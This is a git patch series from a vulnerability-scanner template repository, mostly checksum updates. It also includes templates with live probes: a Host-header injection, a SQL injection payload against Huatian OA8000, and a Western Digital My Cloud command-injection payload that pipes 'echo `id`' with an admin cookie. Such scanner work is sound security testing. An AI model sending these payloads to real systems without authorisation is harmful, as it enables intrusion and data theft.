-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7032,7 +7032,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:fd94b06a3a2adfa55972bfc3a33b2b8231bf430f +templates-checksum.txt:8c5aa2ad4577d9ce37eb4de08321af79e42ff3b3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 091d5233a529e0a60f2f66c2178eac39f0c655b5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Andr=C3=A9=20Luna?= Date: Fri, 1 Sep 2023 08:45:40 -0300 Subject: [PATCH 0068/1090] Added external-service-interaction Template --- .../external-service-interaction.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/miscellaneous/external-service-interaction.yaml diff --git a/http/miscellaneous/external-service-interaction.yaml b/http/miscellaneous/external-service-interaction.yaml new file mode 100644 index 0000000000..01850bce63 --- /dev/null +++ b/http/miscellaneous/external-service-interaction.yaml @@ -0,0 +1,31 @@ +id: external-service-interaction + +info: + name: External Service Interaction + author: andreluna + severity: medium + description: External Service interaction via Host Header Injection. + reference: + - https://portswigger.net/kb/issues/00300210_external-service-interaction-http + - https://success.qualys.com/support/s/article/000006843 + - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection + classification: + cwe-id: CWE-918,CWE-406 + tags: http,miscs + +http: + - method: GET + path: + - "{{BaseURL}}/" + redirects: true + max-redirects: 1 + headers: + Host: "{{interactsh-url}}" + + matchers-condition: or + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" From 9283b80c4222838e0fcbd3a872395de2fe06b44e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Andr=C3=A9?= <2491448+andreluna@users.noreply.github.com> Date: Fri, 1 Sep 2023 13:57:00 +0000 Subject: [PATCH 0069/1090] Update external-service-interaction.yaml Bug fix. Tags and matchers. --- http/miscellaneous/external-service-interaction.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/miscellaneous/external-service-interaction.yaml b/http/miscellaneous/external-service-interaction.yaml index 01850bce63..8f25c6d01e 100644 --- a/http/miscellaneous/external-service-interaction.yaml +++ b/http/miscellaneous/external-service-interaction.yaml @@ -11,7 +11,7 @@ info: - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection classification: cwe-id: CWE-918,CWE-406 - tags: http,miscs + tags: http,misc http: - method: GET @@ -22,10 +22,10 @@ http: headers: Host: "{{interactsh-url}}" - matchers-condition: or matchers: - type: word part: interactsh_protocol words: - "http" - "dns" + condition: or From 3698f0492d2788025a265822bee207b8c5ba44e4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 1 Sep 2023 21:00:09 +0530 Subject: [PATCH 0070/1090] Update huatian-oa8000-buffalo-rce.yaml --- .../other/huatian-oa8000-buffalo-rce.yaml | 30 +++++++++++-------- 1 file changed, 17 insertions(+), 13 deletions(-) diff --git a/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml b/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml index 6fb1322c1f..5c18665984 100644 --- a/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml +++ b/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml @@ -1,30 +1,34 @@ -id: huatian-oa8000-buffalo-rce +id: huatian-oa8000-sqli info: - name: Huatian OA8000 Buffalo - Remote Code Execution + name: Huatian Power OA 8000 workFlowService - SQL injection author: SleepingBag945 severity: critical - description: Huatian OA8000 Buffalo found to be vulnerable to Remote Code Execution vulnerability + description: | + There is a SQL injection vulnerability in the workFlowService interface of Huatian Power OA 8000 version, through which an attacker can obtain sensitive database information + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E5%8D%8E%E5%A4%A9OA/%E5%8D%8E%E5%A4%A9%E5%8A%A8%E5%8A%9BOA%208000%E7%89%88%20workFlowService%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 2 + max-request: 1 verified: true fofa-query: app="华天动力-OA8000" - tags: huatian,oa,buffalo,rce + tags: huatian,oa,sqli http: - raw: - | - GET /OAapp/bfapp/buffalo/ HTTP/1.1 + POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1 Host: {{Hostname}} - - - | - POST /OAapp/bfapp/buffalo/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + + + getDataListForTree + select user() + matchers: - type: dsl dsl: - - status_code_1 == 500 && contains(body_1,'Buffalo worker support POST only!') && contains(body_1,'net.buffalo.service.BuffaloWorker.validate') - - status_code_2 == 500 && contains(body_2,'net.buffalo.service.NoSuchServiceException') && contains(body_2,'net.buffalo.service.BuffaloWorker.processRequest') + - 'status_code == 200' + - 'contains(content_type, "text/xml")' + - 'contains_all(body,"" ,"user()")' condition: and From b67053be8459d8fb9df44d869636353bd4fc6fc5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 1 Sep 2023 21:03:37 +0530 Subject: [PATCH 0071/1090] lint fix --- .../vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml b/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml index 5c18665984..2778509a16 100644 --- a/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml +++ b/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml @@ -19,10 +19,10 @@ http: - | POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1 Host: {{Hostname}} - - - getDataListForTree - select user() + + + getDataListForTree + select user() matchers: From 705ebbceff5f4ae8cb73742545ce17ae760ac02a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 1 Sep 2023 21:14:53 +0530 Subject: [PATCH 0072/1090] Rename huatian-oa8000-buffalo-rce.yaml to huatian-oa8000-sqli.yaml --- .../{huatian-oa8000-buffalo-rce.yaml => huatian-oa8000-sqli.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/vulnerabilities/other/{huatian-oa8000-buffalo-rce.yaml => huatian-oa8000-sqli.yaml} (100%) diff --git a/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml b/http/vulnerabilities/other/huatian-oa8000-sqli.yaml similarity index 100% rename from http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml rename to http/vulnerabilities/other/huatian-oa8000-sqli.yaml From 4b6f70bf43f78e926beed6fa5bc3f277d57ba58d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 15:49:05 +0000 Subject: [PATCH 0073/1090] Auto Generated New Template Addition List [Fri Sep 1 15:49:05 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f8e33bf79f..33833dc991 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ http/technologies/wordpress/plugins/wp-seopress.yaml http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml http/vulnerabilities/jorani/jorani-benjamin-xss.yaml +http/vulnerabilities/other/huatian-oa8000-sqli.yaml http/vulnerabilities/other/landray-oa-datajson-rce.yaml http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml workflows/kev-workflow.yaml From 9c7c2caa987008f6b92c799c416ad51fb96cedaa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 15:49:21 +0000 Subject: [PATCH 0074/1090] Auto Generated Templates Checksum [Fri Sep 1 15:49:21 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f7531e1a1f..2e30dd1648 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6486,6 +6486,7 @@ http/vulnerabilities/other/hongfan-ioffice-sqli.yaml:1aa765b2107063b96f2a27855f4 http/vulnerabilities/other/hospital-management-xss.yaml:8db6e709c266709a159ce1914d761ac3a3894e29 http/vulnerabilities/other/hospital-management-xss2.yaml:c0ed62c74dfa3095138786737f38c16ac6a8ca50 http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml:47d6df9ee15889ee4ac9520afc70572c20b35e5b +http/vulnerabilities/other/huatian-oa8000-sqli.yaml:8a4f5357c7b53e77af41945d6c4ebd3b5bc2ed0d http/vulnerabilities/other/huawei-hg659-lfi.yaml:153ac378223f36a765f5c11859f9686588ef96cd http/vulnerabilities/other/huawei-router-auth-bypass.yaml:02e9cdbfe7a617cc9bd386b768c9cb87cb307828 http/vulnerabilities/other/huijietong-cloud-fileread.yaml:8837f0510adff944c21b7a8bd834d8fb26b324d9 @@ -7032,7 +7033,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:8c5aa2ad4577d9ce37eb4de08321af79e42ff3b3 +templates-checksum.txt:01d616c38ab902d301fa213068c48abecde0574a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 25008c7d5c0c5bb5a0ad657311d404314d2c5987 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 1 Sep 2023 21:20:14 +0530 Subject: [PATCH 0075/1090] info update --- http/misconfiguration/nacos/nacos-create-user.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/misconfiguration/nacos/nacos-create-user.yaml b/http/misconfiguration/nacos/nacos-create-user.yaml index 7796779d37..b51c4aa107 100644 --- a/http/misconfiguration/nacos/nacos-create-user.yaml +++ b/http/misconfiguration/nacos/nacos-create-user.yaml @@ -1,7 +1,7 @@ id: nacos-create-user info: - name: Alibaba Nacos - Token Create User + name: Alibaba Nacos - Unauthorized Account Creation author: SleepingBag945 severity: high description: | @@ -9,10 +9,10 @@ info: reference: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/nacos-token-create-user.yaml metadata: - shodan-query: title:"Nacos" - verified: true max-request: 1 - tags: nacos,unauth,instrusive + verified: true + shodan-query: title:"Nacos" + tags: nacos,unauth,bypass,instrusive http: - raw: From 1e46f1642807d1019f0fa0e6eaadb537a4314990 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 1 Sep 2023 21:22:19 +0530 Subject: [PATCH 0076/1090] req & info update --- http/cves/2018/CVE-2018-17153.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index c21f23b526..d67bbee289 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -8,9 +8,9 @@ info: It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \"cgi_get_ipv6\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \"flag\" with the value \"1\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie. reference: - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/ - - https://nvd.nist.gov/vuln/detail/CVE-2016-10108 - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html - https://securify.nl/nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html + - https://nvd.nist.gov/vuln/detail/CVE-2016-10108 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -20,10 +20,10 @@ info: cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + verified: true shodan-query: http.favicon.hash:-1074357885 vendor: western_digital product: my_cloud_wdbctl0020hwt_firmware - verified: true tags: cve,cve2018,auth-bypass,rce,wdcloud http: @@ -32,8 +32,6 @@ http: POST /web/google_analytics.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - Referer: {{RootURL}} Cookie: isAdmin=1; username=admin; cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23 From b45afc65de256dc44e0ccb9a7157b2e2f4d7f02b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 15:53:21 +0000 Subject: [PATCH 0077/1090] Auto Generated New Template Addition List [Fri Sep 1 15:53:20 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 33833dc991..46c92a8fef 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ http/cves/2023/CVE-2023-36844.yaml http/exposed-panels/aspcms-backend-panel.yaml http/exposed-panels/greenbone-panel.yaml http/misconfiguration/ecology-info-leak.yaml +http/misconfiguration/nacos/nacos-create-user.yaml http/misconfiguration/php-debugbar-exposure.yaml http/takeovers/lemlist-takeover.yaml http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml From 9fc239b440764d08999d5cb5f6179261208bfa8d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 15:53:24 +0000 Subject: [PATCH 0078/1090] Auto Generated Templates Checksum [Fri Sep 1 15:53:24 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2e30dd1648..edc03c9c98 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4549,6 +4549,7 @@ http/misconfiguration/moleculer-microservices.yaml:504cfc24010ed454d66e014e62e28 http/misconfiguration/mongodb-exporter-metrics.yaml:d98f2aede304f7462730fd61743fc0dff017aa5f http/misconfiguration/multilaser-pro-setup.yaml:ee5a7afe337aa891ced4039755cb587246e67057 http/misconfiguration/mysqld-exporter-metrics.yaml:c4eeb835f1751609aca35011a762faa1a2fa39f2 +http/misconfiguration/nacos/nacos-create-user.yaml:ee86ccd52e51bf7181f3f95815466823e611c988 http/misconfiguration/nacos-authentication-bypass.yaml:0563da3bf8c47700170d9bbf77effe33b7602092 http/misconfiguration/namedprocess-exporter-metrics.yaml:0c7cf7b10c1b8aba887b58872878a69b22598f5c http/misconfiguration/nextcloud-install.yaml:979b190886782e690c584789c104dd1ad716be5c @@ -7033,7 +7034,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 